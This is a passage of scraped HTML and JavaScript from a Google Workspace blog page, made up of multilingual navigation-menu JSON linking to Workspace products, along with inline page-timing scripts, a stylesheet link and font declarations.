機械学習\",\"/blog/ja/ai-machine-learning\"],[\"生産性とコラボレーション\",\"/blog/ja/productivity-collaboration\"],[\"アイデンティティとセキュリティ\",\"/blog/ja/identity-and-security\"],[\"未来の働き方\",\"/blog/ja/future-of-work\"],[\"ハイブリッドな働き方\",\"/blog/ja/hybrid-work\"],[\"顧客事例\",\"/blog/ja/customer-stories\"],[\"デベロッパー\",\"/blog/ja/developers-practitioners\"],[\"パートナー\",\"/blog/ja/partners\"],[\"イベント\",\"/blog/ja/events\"],[\"公共部門\",\"/blog/ja/public-sector\"]]]],[\"製品ニュース\",null,[[[\"Gmail\",\"/blog/ja/gmail\"],[\"Meet\",\"/blog/ja/meet\"],[\"Chat and Spaces\",\"/blog/ja/chat-spaces\"],[\"ドライブ\",\"/blog/ja/drive\"],[\"ドキュメント\",\"/blog/ja/docs\"],[\"スプレッドシート\",\"/blog/ja/sheets\"]]]]]]],[\"ko\",[[[\"주제\",null,[[[\"제품 업데이트\",\"/blog/ko/product-announcements\"],[\"AI 및 머신러닝\",\"/blog/ko/ai-machine-learning\"],[\"생산성 및 공동작업\",\"/blog/ko/productivity-collaboration\"],[\"인증 및 보안 \",\"/blog/ko/identity-and-security\"],[\"Future of Work\",\"/blog/ko/future-of-work\"],[\"하이브리드 업무\",\"/blog/ko/hybrid-work\"],[\"고객 사례\",\"/blog/ko/customer-stories\"],[\"개발자\",\"/blog/ko/developers-practitioners\"],[\"파트너\",\"/blog/ko/partners\"],[\"이벤트\",\"/blog/ko/events\"],[\"공공부문\",\"/blog/ko/public-sector\"]]]],[\"제품 소식\",null,[[[\"Gmail\",\"/blog/ko/gmail\"],[\"Meet\",\"/blog/ko/meet\"],[\"Chat 및 Spaces\",\"/blog/ko/chat-spaces\"],[\"Drive\",\"/blog/ko/drive\"],[\"Docs\",\"/blog/ko/docs\"],[\"Sheets\",\"/blog/ko/sheets\"]]]]]]]],null,[[\"de\",[[[[[\"Enthaltene Anwendungen\",\"https://workspace.google.com/intl/de/features/\",[[[\"Gmail\",\"https://workspace.google.com/intl/de/products/gmail/\"],[\"Meet\",\"https://workspace.google.com/intl/de/products/meet/\"],[\"Chat\",\"https://workspace.google.com/intl/de/products/chat/\"],[\"Kalender\",\"https://workspace.google.com/intl/de/products/calendar/\"],[\"Drive\",\"https://workspace.google.com/intl/de/products/drive/\"],[\"Docs\",\"https://workspace.google.com/intl/de/products/docs/\"],[\"Tabellen\",\"https://workspace.google.com/intl/de/products/sheets/\"],[\"Präsentationen\",\"https://workspace.google.com/intl/de/products/slides/\"],[\"Formulare\",\"https://workspace.google.com/intl/de/products/forms/\"],[\"Sites\",\"https://workspace.google.com/intl/de/products/sites/\"],[\"Notizen\",\"https://workspace.google.com/intl/de/products/keep/\"],[\"Apps Script\",\"https://workspace.google.com/intl/de/products/apps-script/\"]]]]]],[[[\"Sicherheit und Verwaltung\",\"https://workspace.google.com/intl/de/security/\",[[[\"Admin\",\"https://workspace.google.com/intl/de/products/admin/\"],[\"Endpunkt\",\"https://workspace.google.com/intl/de/products/admin/endpoint/\"],[\"Vault\",\"https://workspace.google.com/intl/de/products/vault/\"],[\"Work Insights\",\"https://workspace.google.com/intl/de/products/workinsights/\"]]]],[\"Lösungen\",\"https://workspace.google.com/intl/de/solutions/\",[[[\"Neue Unternehmen\",\"https://workspace.google.com/intl/de/business/new-business/\"],[\"Kleine Unternehmen\",\"https://workspace.google.com/intl/de/business/small-business/\"],[\"Große Unternehmen\",\"https://workspace.google.com/intl/de/solutions/enterprise/\"],[\"Education\",\"https://edu.google.com/products/workspace-for-education/education-fundamentals/\"],[\"Nonprofit-Organisationen\",\"https://www.google.com/nonprofits/\"]]]]]],[[[\"Preise\",\"https://workspace.google.com/intl/de/pricing.html\",[[[\"Version auswählen\",\"https://workspace.google.com/intl/de/pricing.html\"]]]],[\"Add-ons\",null,[[[\"Gemini für Workspace\",\"https://workspace.google.com/solutions/ai/\"],[\"Google Voice\",\"https://workspace.google.com/intl/de/products/voice/\"],[\"AppSheet\",\"https://about.appsheet.com/home/\"]]]]]],[[[\"Ressourcen\",\"https://workspace.google.com/intl/de/faq/\",[[[\"Telearbeit\",\"https://workspace.google.com/intl/de/working-remotely/\"],[\"Sicherheit\",\"https://workspace.google.com/intl/de/security/\"],[\"FAQ\",\"https://workspace.google.com/intl/de/faq/\"],[\"Partner\",\"https://cloud.withgoogle.com/partners/?products\\u003dGOOGLE_WORKSPACE_PRODUCT\"],[\"Google Workspace Marketplace\",\"https://workspace.google.com/marketplace/\"],[\"Integrationen\",\"https://workspace.google.com/intl/de/integrations/\"],[\"Schulung \\u0026 Zertifizierung\",\"https://workspace.google.com/intl/de/training/\"]]]]]],[[[\"Schulung und Support\",\"https://workspace.google.com/intl/de/support/\",[[[\"Admin-Hilfe\",\"https://support.google.com/a/#topic\\u003d29157\"],[\"Einrichtungs- und Bereitstellungscenter\",\"https://workspace.google.com/setup/?hl\\u003dde\"],[\"Schulungscenter für Nutzer\",\"https://workspace.google.com/intl/de/learning-center/\"],[\"Foren für Administratoren\",\"https://productforums.google.com/forum/#!forum/apps\"],[\"Google Workspace-Dashboard\",\"https://www.google.com/appsstatus\"],[\"Presse\",\"https://cloud.google.com/press/\"]]]],[\"Mehr von Google\",null,[[[\"Google Cloud\",\"https://cloud.google.com/?hl\\u003dde\"],[\"Chrome Enterprise\",\"https://chromeenterprise.google/\"],[\"Google Lösungen für Unternehmen\",\"https://www.google.com/intl/de/services/\"],[\"Google Ads\",\"https://ads.google.com/home/?subid\\u003dde-de-xs-aw-z-a-dyn-accounts_wsft!o3\"],[\"Business Messages\",\"https://businessmessages.google/\"],[\"An Nutzerstudien teilnehmen\",\"https://userresearch.google.com/?reserved\\u003d0\\u0026utm_source\\u003dgsuite.google.com\\u0026Q_Language\\u003den\\u0026utm_medium\\u003down_srch\\u0026utm_campaign\\u003dGlobal-GSuite\\u0026utm_term\\u003d0\\u0026utm_content\\u003d0\\u0026productTag\\u003dgafw\\u0026campaignDate\\u003dnov18\\u0026pType\\u003dbprof\\u0026referral_code\\u003dug422768\"]]]]]]]]],[\"en\",[[[[[\"Included applications\",\"https://workspace.google.com/features/\",[[[\"Gmail\",\"https://workspace.google.com/products/gmail/\"],[\"Meet\",\"https://workspace.google.com/products/meet/\"],[\"Chat\",\"https://workspace.google.com/products/chat/\"],[\"Calendar\",\"https://workspace.google.com/products/calendar/\"],[\"Drive\",\"https://workspace.google.com/products/drive/\"],[\"Docs\",\"https://workspace.google.com/products/docs/\"],[\"Sheets\",\"https://workspace.google.com/products/sheets/\"],[\"Slides\",\"https://workspace.google.com/products/slides/\"],[\"Forms\",\"https://workspace.google.com/products/forms/\"],[\"Sites\",\"https://workspace.google.com/products/sites/\"],[\"Keep\",\"https://workspace.google.com/products/keep/\"],[\"Apps Script\",\"https://workspace.google.com/products/apps-script/\"]]]]]],[[[\"Security and management\",\"https://workspace.google.com/security/\",[[[\"Admin\",\"https://workspace.google.com/products/admin/\"],[\"Endpoint\",\"https://workspace.google.com/products/admin/endpoint/\"],[\"Vault\",\"https://workspace.google.com/products/vault/\"],[\"Work Insights\",\"https://workspace.google.com/products/workinsights/\"]]]],[\"Solutions\",\"https://workspace.google.com/solutions/\",[[[\"New Business\",\"https://workspace.google.com/business/new-business/\"],[\"Small Business\",\"https://workspace.google.com/business/small-business/\"],[\"Enterprise\",\"https://workspace.google.com/solutions/enterprise/\"],[\"Retail\",\"https://workspace.google.com/industries/retail/\"],[\"Manufacturing\",\"https://workspace.google.com/industries/manufacturing/\"],[\"Professional Services\",\"https://workspace.google.com/industries/professional-services/\"],[\"Technology\",\"https://workspace.google.com/industries/technology/\"],[\"Healthcare\",\"https://workspace.google.com/industries/healthcare/\"],[\"Government\",\"https://workspace.google.com/industries/government/\"],[\"Education\",\"https://edu.google.com/products/workspace-for-education/education-fundamentals/\"],[\"Nonprofits\",\"https://www.google.com/nonprofits/\"],[\"Artificial Intelligence\",\"https://workspace.google.com/solutions/ai/\"]]]]]],[[[\"Pricing\",\"https://workspace.google.com/pricing.html\",[[[\"Compare pricing plans\",\"https://workspace.google.com/pricing.html\"]]]],[\"Add-ons\",null,[[[\"Gemini for Workspace\",\"https://workspace.google.com/solutions/ai/\"],[\"Meet hardware\",\"https://workspace.google.com/products/meet-hardware/\"],[\"Google Voice\",\"https://workspace.google.com/products/voice/\"],[\"AppSheet\",\"https://about.appsheet.com/home/\"]]]]]],[[[\"Resources\",\"https://workspace.google.com/faq/\",[[[\"Working remotely\",\"https://workspace.google.com/working-remotely/\"],[\"Security\",\"https://workspace.google.com/security/\"],[\"Customer Stories\",\"https://workspace.google.com/customers/\"],[\"FAQs\",\"https://workspace.google.com/faq/\"],[\"Partners\",\"https://cloud.withgoogle.com/partners/?products\\u003dGOOGLE_WORKSPACE_PRODUCT\"],[\"Marketplace\",\"https://workspace.google.com/marketplace/\"],[\"Integrations\",\"https://workspace.google.com/integrations/\"],[\"Training \\u0026 Certification\",\"https://workspace.google.com/training/\"],[\"Refer Google Workspace\",\"https://workspace.google.com/landing/partners/referral/\"]]]]]],[[[\"Learning and support\",\"https://workspace.google.com/support/\",[[[\"Admin Help\",\"https://support.google.com/a/#topic\\u003d29157\"],[\"Setup and Deployment Center\",\"https://workspace.google.com/setup\"],[\"Learning Center for Users\",\"https://workspace.google.com/learning-center/\"],[\"Forums for Admins\",\"https://productforums.google.com/forum/#!forum/apps\"],[\"Google Workspace Dashboard\",\"https://www.google.com/appsstatus\"],[\"What\u0027s New in Google Workspace\",\"https://workspace.google.com/whatsnew/\"],[\"Find a Google Workspace Partner\",\"https://www.google.com/a/partnersearch/\"],[\"Join the community of IT Admins\",\"https://www.googlecloudcommunity.com/gc/Google-Workspace/ct-p/google-workspace\"],[\"Press\",\"https://cloud.google.com/press/\"]]]],[\"More from Google\",null,[[[\"Google Cloud\",\"https://cloud.google.com/\"],[\"Google Domains\",\"https://domains.google.com/about/?utm_source\\u003dgoogleappsforwork\\u0026utm_medium\\u003dreferral\\u0026utm_campaign\\u003dgooglepromos\"],[\"Chrome Enterprise\",\"https://chromeenterprise.google/\"],[\"Google Business Solutions\",\"https://www.google.com/services/\"],[\"Google Ads\",\"https://ads.google.com/home/?subid\\u003dus-en-xs-aw-z-a-dyn-accounts_wsft!o3\"],[\"Business Messages\",\"https://businessmessages.google/\"],[\"Join User Studies\",\"https://userresearch.google.com/?reserved\\u003d0\\u0026utm_source\\u003dgsuite.google.com\\u0026Q_Language\\u003den\\u0026utm_medium\\u003down_srch\\u0026utm_campaign\\u003dGlobal-GSuite\\u0026utm_term\\u003d0\\u0026utm_content\\u003d0\\u0026productTag\\u003dgafw\\u0026campaignDate\\u003dnov18\\u0026pType\\u003dbprof\\u0026referral_code\\u003dug422768\"]]]]]]]]],[\"fr\",[[[[[\"Enthaltene Anwendungen\",\"https://workspace.google.com/intl/fr/features/\",[[[\"Gmail\",\"https://workspace.google.com/intl/fr/products/gmail/\"],[\"Meet\",\"https://workspace.google.com/intl/fr/products/meet/\"],[\"Chat\",\"https://workspace.google.com/intl/fr/products/chat/\"],[\"Google Agenda\",\"https://workspace.google.com/intl/fr/products/calendar/\"],[\"Drive\",\"https://workspace.google.com/intl/fr/products/drive/\"],[\"Docs\",\"https://workspace.google.com/intl/fr/products/docs/\"],[\"Sheets\",\"https://workspace.google.com/intl/fr/products/sheets/\"],[\"Slides\",\"https://workspace.google.com/intl/fr/products/slides/\"],[\"Forms\",\"https://workspace.google.com/intl/fr/products/forms/\"],[\"Google Sites\",\"https://workspace.google.com/intl/fr/products/sites/\"],[\"Keep\",\"https://workspace.google.com/intl/fr/products/keep/\"],[\"Apps Script\",\"https://workspace.google.com/intl/fr/products/apps-script/\"]]]]]],[[[\"Sécurité et gestion\",\"https://workspace.google.com/intl/fr/security/\",[[[\"Console d\u0027administration\",\"https://workspace.google.com/intl/fr/products/admin/\"],[\"Point de terminaison\",\"https://workspace.google.com/intl/fr/products/admin/endpoint/\"],[\"Vault\",\"https://workspace.google.com/intl/fr/products/vault/\"],[\"Work Insights\",\"https://workspace.google.com/intl/fr/products/workinsights/\"]]]],[\"Solutions\",\"https://workspace.google.com/intl/fr/solutions/\",[[[\"Nouvelle entreprise\",\"https://workspace.google.com/intl/fr/business/new-business/\"],[\"PME\",\"https://workspace.google.com/intl/fr/business/small-business/\"],[\"Grande entreprise\",\"https://workspace.google.com/intl/fr/solutions/enterprise/\"],[\"Education\",\"https://edu.google.com/products/workspace-for-education/education-fundamentals/\"],[\"Associations\",\"https://www.google.com/nonprofits/\"]]]]]],[[[\"Tarifs\",\"https://workspace.google.com/intl/fr/pricing.html\",[[[\"Choisissez une édition\",\"https://workspace.google.com/intl/fr/pricing.html\"]]]],[\"Add-ons\",null,[[[\"Gemini pour Workspace\",\"https://workspace.google.com/solutions/ai/\"],[\"Matériel Meet\",\"https://workspace.google.com/intl/fr/products/meet-hardware/\"],[\"Google Voice\",\"https://workspace.google.com/intl/fr/products/voice/\"],[\"AppSheet\",\"https://about.appsheet.com/home/\"]]]]]],[[[\"Ressources\",\"https://workspace.google.com/intl/fr/faq/\",[[[\"Travail à distance\",\"https://workspace.google.com/intl/fr/working-remotely/\"],[\"Sécurité\",\"https://workspace.google.com/intl/fr/security/\"],[\"Questions fréquentes\",\"https://workspace.google.com/intl/fr/faq/\"],[\"Partenaires\",\"https://cloud.withgoogle.com/partners/?products\\u003dGOOGLE_WORKSPACE_PRODUCT\"],[\"Marketplace\",\"https://workspace.google.com/marketplace/\"],[\"Intégrations\",\"https://workspace.google.com/intl/fr/integrations/\"],[\"Formation et certification\",\"https://workspace.google.com/intl/fr/training/\"]]]]]],[[[\"Formation et assistance\",\"https://workspace.google.com/intl/fr/support/\",[[[\"Aide pour les administrateurs\",\"https://support.google.com/a/#topic\\u003d29157\"],[\"Centre de configuration et de déploiement\",\"https://workspace.google.com/setup/?hl\\u003dfr\"],[\"Centre de formation pour les utilisateurs\",\"https://workspace.google.com/intl/fr/learning-center/\"],[\"Forums pour les administrateurs\",\"https://productforums.google.com/forum/#!forum/apps\"],[\"Tableau de bord Google Workspace\",\"https://www.google.com/appsstatus#hl\\u003dfr\"],[\"Rechercher un partenaire Google Workspace\",\"https://www.google.com/a/partnersearch/?hl\\u003dfr#home\"],[\"Presse\",\"https://cloud.google.com/press/\"]]]],[\"Autres ressources Google\",null,[[[\"Google Cloud\",\"https://cloud.google.com/?hl\\u003dfr\"],[\"Chrome Enterprise\",\"https://chromeenterprise.google/\"],[\"Solutions d\u0027entreprise Google\",\"https://www.google.com/intl/fr/services/\"],[\"Google pour les Pros\",\"https://pourlespros.withgoogle.com/?utm_source\\u003dEngagement\\u0026utm_medium\\u003dep\\u0026utm_term\\u003dSMB\\u0026utm_content\\u003dFR%20Apps%20for%20work%20footert\\u0026utm_campaign\\u003dQ4_2015%20FR%20Apps%20for%20work%20footer\"],[\"Google Ads\",\"https://ads.google.com/home/?subid\\u003dfr-fr-xs-aw-z-a-dyn-accounts_wsft!o3\"],[\"Business Messages\",\"https://businessmessages.google/\"],[\"Participer aux études sur l\u0027expérience utilisateur\",\"https://userresearch.google.com/?reserved\\u003d0\\u0026utm_source\\u003dgsuite.google.com\\u0026Q_Language\\u003den\\u0026utm_medium\\u003down_srch\\u0026utm_campaign\\u003dGlobal-GSuite\\u0026utm_term\\u003d0\\u0026utm_content\\u003d0\\u0026productTag\\u003dgafw\\u0026campaignDate\\u003dnov18\\u0026pType\\u003dbprof\\u0026referral_code\\u003dug422768\"]]]]]]]]],[\"ja\",[[[[[\"ご利用いただけるアプリケーション\",\"https://workspace.google.com/intl/ja/features/\",[[[\"Gmail\",\"https://workspace.google.com/intl/ja/products/gmail/\"],[\"Meet\",\"https://workspace.google.com/intl/ja/products/meet/\"],[\"Chat\",\"https://workspace.google.com/intl/ja/products/chat/\"],[\"カレンダー\",\"https://workspace.google.com/intl/ja/products/calendar/\"],[\"ドライブ\",\"https://workspace.google.com/intl/ja/products/drive/\"],[\"ドキュメント\",\"https://workspace.google.com/intl/ja/products/docs/\"],[\"スプレッドシート\",\"https://workspace.google.com/intl/ja/products/sheets/\"],[\"スライド\",\"https://workspace.google.com/intl/ja/products/slides/\"],[\"フォーム\",\"https://workspace.google.com/intl/ja/products/forms/\"],[\"サイト\",\"https://workspace.google.com/intl/ja/products/sites/\"],[\"Keep\",\"https://workspace.google.com/intl/ja/products/keep/\"],[\"Apps Script\",\"https://workspace.google.com/intl/ja/products/apps-script/\"]]]]]],[[[\"セキュリティと管理\",\"https://workspace.google.com/intl/ja/security/\",[[[\"管理コンソール\",\"https://workspace.google.com/intl/ja/products/admin/\"],[\"エンドポイント\",\"https://workspace.google.com/intl/ja/products/admin/endpoint/\"],[\"Vault\",\"https://workspace.google.com/intl/ja/products/vault/\"],[\"Work Insights\",\"https://workspace.google.com/intl/ja/products/workinsights/\"]]]],[\"ソリューション\",\"https://workspace.google.com/intl/ja/solutions/\",[[[\"新規ビジネス\",\"https://workspace.google.com/intl/ja/business/new-business/\"],[\"小規模ビジネス\",\"https://workspace.google.com/intl/ja/business/small-business/\"],[\"大規模ビジネス\",\"https://workspace.google.com/intl/ja/solutions/enterprise/\"],[\"Education\",\"https://edu.google.com/intl/ja/products/workspace-for-education/education-fundamentals/\"],[\"非営利団体\",\"https://www.google.com/intl/ja/nonprofits/\"]]]]]],[[[\"料金\",\"https://workspace.google.com/intl/ja/pricing.html\",[[[\"エディションを選ぶ\",\"https://workspace.google.com/intl/ja/pricing.html\"]]]],[\"Add-ons\",null,[[[\"Gemini for Workspace\",\"https://workspace.google.com/solutions/ai/\"],[\"Meet ハードウェア\",\"https://workspace.google.com/intl/ja/products/meet-hardware/\"],[\"AppSheet\",\"https://about.appsheet.com/home/\"]]]]]],[[[\"関連情報\",\"https://workspace.google.com/intl/ja/faq/\",[[[\"リモートワーク\",\"https://workspace.google.com/intl/ja/working-remotely/\"],[\"セキュリティ\",\"https://workspace.google.com/intl/ja/security/\"],[\"事例紹介\",\"https://workspace.google.com/intl/ja/customers/\"],[\"よくある質問\",\"https://workspace.google.com/intl/ja/faq/\"],[\"パートナー\",\"https://cloud.withgoogle.com/partners/?products\\u003dGOOGLE_WORKSPACE_PRODUCT\"],[\"Marketplace\",\"https://workspace.google.com/intl/ja/marketplace/\"],[\"統合\",\"https://workspace.google.com/intl/ja/integrations/\"],[\"トレーニングと認定資格\",\"https://workspace.google.com/intl/ja/training/\"]]]]]],[[[\"学習とサポート\",\"https://workspace.google.com/intl/ja/support/\",[[[\"管理者用ヘルプ\",\"https://support.google.com/a/#topic\\u003d29157\"],[\"設定と導入のガイド\",\"https://workspace.google.com/setup/?hl\\u003dja\"],[\"ユーザー向けラーニング センター\",\"https://workspace.google.com/intl/ja/learning-center/\"],[\"管理者向けフォーラム\",\"https://productforums.google.com/forum/#!forum/apps\"],[\"Google Workspace ステータス ダッシュボード\",\"https://www.google.com/appsstatus#hl\\u003dja\"],[\"Google Workspace パートナーを探す\",\"https://www.google.com/a/partnersearch/?hl\\u003dja#home\"],[\"プレスリリース\",\"https://cloud.google.com/press/?hl\\u003dja\"]]]],[\"その他の Google サービス\",null,[[[\"Google Cloud\",\"https://cloud.google.com/?hl\\u003dja\"],[\"Chrome Enterprise\",\"https://chromeenterprise.google/\"],[\"Google ビジネス ソリューション\",\"https://www.google.com/intl/ja/services/\"],[\"Google 広告\",\"https://ads.google.com/home/?subid\\u003dja-ja-xs-aw-z-a-dyn-accounts_wsft!o3\"],[\"Business Messages\",\"https://businessmessages.google/\"],[\"ユーザー調査に参加する\",\"https://userresearch.google.com/?reserved\\u003d0\\u0026utm_source\\u003dgsuite.google.com\\u0026Q_Language\\u003den\\u0026utm_medium\\u003down_srch\\u0026utm_campaign\\u003dGlobal-GSuite\\u0026utm_term\\u003d0\\u0026utm_content\\u003d0\\u0026productTag\\u003dgafw\\u0026campaignDate\\u003dnov18\\u0026pType\\u003dbprof\\u0026referral_code\\u003dug422768\"]]]]]]]]],[\"ko\",[[[[[\"포함된 애플리케이션\",\"https://workspace.google.com/intl/ko/features/\",[[[\"Gmail\",\"https://workspace.google.com/intl/ko/products/gmail/\"],[\"Meet\",\"https://workspace.google.com/intl/ko/products/meet/\"],[\"Chat\",\"https://workspace.google.com/intl/ko/products/chat/\"],[\"Calendar\",\"https://workspace.google.com/intl/ko/products/calendar/\"],[\"Drive\",\"https://workspace.google.com/intl/ko/products/drive/\"],[\"Docs\",\"https://workspace.google.com/intl/ko/products/docs/\"],[\"Sheets\",\"https://workspace.google.com/intl/ko/products/sheets/\"],[\"Slides\",\"https://workspace.google.com/intl/ko/products/slides/\"],[\"설문지\",\"https://workspace.google.com/intl/ko/products/forms/\"],[\"사이트 도구\",\"https://workspace.google.com/intl/ko/products/sites/\"],[\"Keep\",\"https://workspace.google.com/intl/ko/products/keep/\"],[\"Apps Script\",\"https://workspace.google.com/intl/ko/products/apps-script/\"]]]]]],[[[\"보안 및 관리\",\"https://workspace.google.com/intl/ko/security/\",[[[\"관리\",\"https://workspace.google.com/intl/ko/products/admin/\"],[\"엔드포인트\",\"https://workspace.google.com/intl/ko/products/admin/endpoint/\"],[\"Vault\",\"https://workspace.google.com/intl/ko/products/vault/\"],[\"Work Insights\",\"https://workspace.google.com/intl/ko/products/workinsights/\"]]]],[\"솔루션\",\"https://workspace.google.com/intl/ko/solutions/\",[[[\"신규 업체\",\"https://workspace.google.com/intl/ko/business/new-business/\"],[\"중소기업\",\"https://workspace.google.com/intl/ko/business/small-business/\"],[\"엔터프라이즈\",\"https://workspace.google.com/intl/ko/solutions/enterprise/\"],[\"Education\",\"https://edu.google.com/products/workspace-for-education/education-fundamentals/\"],[\"비영리단체\",\"https://www.google.com/nonprofits/\"]]]]]],[[[\"가격\",\"https://workspace.google.com/intl/ko/pricing.html\",[[[\"버전 선택\",\"https://workspace.google.com/intl/ko/pricing.html\"]]]],[\"Add-ons\",null,[[[\"Workspace를 위한 Gemini\",\"https://workspace.google.com/solutions/ai/\"],[\"AppSheet\",\"https://about.appsheet.com/home/\"]]]]]],[[[\"리소스\",\"https://workspace.google.com/intl/ko/faq/\",[[[\"원격 근무\",\"https://workspace.google.com/intl/ko/working-remotely/\"],[\"보안\",\"https://workspace.google.com/intl/ko/security/\"],[\"FAQ\",\"https://workspace.google.com/intl/ko/faq/\"],[\"파트너\",\"https://cloud.withgoogle.com/partners/?products\\u003dGOOGLE_WORKSPACE_PRODUCT\"],[\"Marketplace\",\"https://workspace.google.com/intl/ko/marketplace/\"],[\"통합\",\"https://workspace.google.com/intl/ko/integrations/\"],[\"교육 및 인증\",\"https://workspace.google.com/intl/ko/training/\"]]]]]],[[[\"학습 및 지원\",\"https://workspace.google.com/intl/ko/support/\",[[[\"관리자 도움말\",\"https://support.google.com/a/#topic\\u003d29157\"],[\"설치 및 배포 센터\",\"https://workspace.google.com/setup/?hl\\u003dko\"],[\"사용자를 위한 학습 센터\",\"https://workspace.google.com/intl/ko/learning-center/\"],[\"관리자 포럼\",\"https://productforums.google.com/forum/#!forum/apps\"],[\"Google Workspace 대시보드\",\"https://www.google.com/appsstatus#hl\\u003dko\"],[\"Google Workspace 파트너 찾기\",\"https://www.google.com/a/partnersearch/?hl\\u003dko#home\"],[\"보도자료\",\"https://cloud.google.com/press/\"]]]],[\"Google의 다른 제품\",null,[[[\"Google Cloud\",\"https://cloud.google.com/?hl\\u003dko\"],[\"Chrome Enterprise\",\"https://chromeenterprise.google/\"],[\"Google 비즈니스 솔루션\",\"https://www.google.com/intl/ko_kr/business/\"],[\"Google Ads\",\"https://ads.google.com/home/?subid\\u003dkr-ko-xs-aw-z-a-dyn-accounts_wsft!o3\"],[\"Business Messages\",\"https://businessmessages.google/\"],[\"사용자 연구 참여\",\"https://userresearch.google.com/?reserved\\u003d0\\u0026utm_source\\u003dgsuite.google.com\\u0026Q_Language\\u003den\\u0026utm_medium\\u003down_srch\\u0026utm_campaign\\u003dGlobal-GSuite\\u0026utm_term\\u003d0\\u0026utm_content\\u003d0\\u0026productTag\\u003dgafw\\u0026campaignDate\\u003dnov18\\u0026pType\\u003dbprof\\u0026referral_code\\u003dug422768\"]]]]]]]]]]]","w2btAe":"%.@.null,null,\"\",false,null,null,true,false]","xn5OId":false,"xnI9P":true,"xwAfE":true,"y2FhP":"prod","yFnxrf":1884,"zChJod":"%.@.]"};</script><script nonce="-49Bz_4wsckd3k4vDG-wCQ">(function(){'use strict';var a=window,d=a.performance,l=k();a.cc_latency_start_time=d&&d.now?0:d&&d.timing&&d.timing.navigationStart?d.timing.navigationStart:l;function k(){return d&&d.now?d.now():(new Date).getTime()}function n(e){if(d&&d.now&&d.mark){var g=d.mark(e);if(g)return g.startTime;if(d.getEntriesByName&&(e=d.getEntriesByName(e).pop()))return e.startTime}return k()}a.onaft=function(){n("aft")};a._isLazyImage=function(e){return e.hasAttribute("data-src")||e.hasAttribute("data-ils")||e.getAttribute("loading")==="lazy"}; a.l=function(e){function g(b){var c={};c[b]=k();a.cc_latency.push(c)}function m(b){var c=n("iml");b.setAttribute("data-iml",c);return c}a.cc_aid=e;a.iml_start=a.cc_latency_start_time;a.css_size=0;a.cc_latency=[];a.ccTick=g;a.onJsLoad=function(){g("jsl")};a.onCssLoad=function(){g("cssl")};a._isVisible=function(b,c){if(!c||c.style.display=="none")return!1;var f=b.defaultView;if(f&&f.getComputedStyle&&(f=f.getComputedStyle(c),f.height=="0px"||f.width=="0px"||f.visibility=="hidden"))return!1;if(!c.getBoundingClientRect)return!0; var h=c.getBoundingClientRect();c=h.left+a.pageXOffset;f=h.top+a.pageYOffset;if(f+h.height<0||c+h.width<0||h.height<=0||h.width<=0)return!1;b=b.documentElement;return f<=(a.innerHeight||b.clientHeight)&&c<=(a.innerWidth||b.clientWidth)};a._recordImlEl=m;document.documentElement.addEventListener("load",function(b){b=b.target;var c;b.tagName!="IMG"||b.hasAttribute("data-iid")||a._isLazyImage(b)||b.hasAttribute("data-noaft")||(c=m(b));if(a.aft_counter&&(b=a.aft_counter.indexOf(b),b!==-1&&(b=a.aft_counter.splice(b, 1).length===1,a.aft_counter.length===0&&b&&c)))a.onaft(c)},!0);a.prt=-1;a.wiz_tick=function(){var b=n("prt");a.prt=b}};}).call(this); l('DK1zsb')</script><script nonce="-49Bz_4wsckd3k4vDG-wCQ">var _F_cssRowKey = 'boq-cloudx-web-blog.TransformBlogUi.kBvWwdAt86U.L.X.O';var _F_combinedSignature = 'AHrnUqUMne414GLMZipCdLurIRsd0ykfYQ';function _DumpException(e) {throw e;}</script><link rel="stylesheet" href="https://www.gstatic.com/_/mss/boq-cloudx-web-blog/_/ss/k=boq-cloudx-web-blog.TransformBlogUi.kBvWwdAt86U.L.X.O/am=OBgwCw/d=1/ed=1/rs=AHrnUqUdHr1ILLldbe8xmK4BOgod6WRp4g/m=articleview,_b,_tp" data-id="_cl" nonce="IrMwwvIEuc2HNgGc6OONSQ"><script nonce="-49Bz_4wsckd3k4vDG-wCQ">onCssLoad();</script><style nonce="IrMwwvIEuc2HNgGc6OONSQ">@font-face{font-family:'Product Sans';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/productsans/v9/pxiDypQkot1TnFhsFMOfGShVF9eK.eot);}@font-face{font-family:'Google Sans';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/googlesans/v58/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrwEIJllpy0.eot);}@font-face{font-family:'Google Sans';font-style:normal;font-weight:500;src:url(https://fonts.gstatic.com/s/googlesans/v58/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrw2IJllpy0.eot);}@font-face{font-family:'Google Sans';font-style:normal;font-weight:700;src:url(https://fonts.gstatic.com/s/googlesans/v58/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrzjJ5llpy0.eot);}@font-face{font-family:'Google Sans Display';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/googlesansdisplay/v13/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDv79pQ.eot);}@font-face{font-family:'Google Sans Display';font-style:normal;font-weight:500;src:url(https://fonts.gstatic.com/s/googlesansdisplay/v13/ea8IacM9Wef3EJPWRrHjgE4B6CnlZxHVBg3etBD7SA.eot);}@font-face{font-family:'Google Sans Display';font-style:normal;font-weight:700;src:url(https://fonts.gstatic.com/s/googlesansdisplay/v13/ea8IacM9Wef3EJPWRrHjgE4B6CnlZxHVBkXYtBD7SA.eot);}</style><script nonce="-49Bz_4wsckd3k4vDG-wCQ">(function(){'use strict';function e(){var a=g,b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var l=this||self;/* Copyright 2024 Google, Inc SPDX-License-Identifier: MIT */ var m=["focus","blur","error","load","toggle"];function n(a){return a==="mouseenter"?"mouseover":a==="mouseleave"?"mouseout":a==="pointerenter"?"pointerover":a==="pointerleave"?"pointerout":a};function p(a){this.l={};this.m={};this.i=null;this.g=[];this.o=a}p.prototype.handleEvent=function(a,b,c){q(this,{eventType:a,event:b,targetElement:b.target,eic:c,timeStamp:Date.now(),eia:void 0,eirp:void 0,eiack:void 0})};function q(a,b){if(a.i)a.i(b);else{b.eirp=!0;var c;(c=a.g)==null||c.push(b)}} function r(a,b,c){if(!(b in a.l)&&a.o){var d=function(h,f,B){a.handleEvent(h,f,B)};a.l[b]=d;c=n(c||b);if(c!==b){var 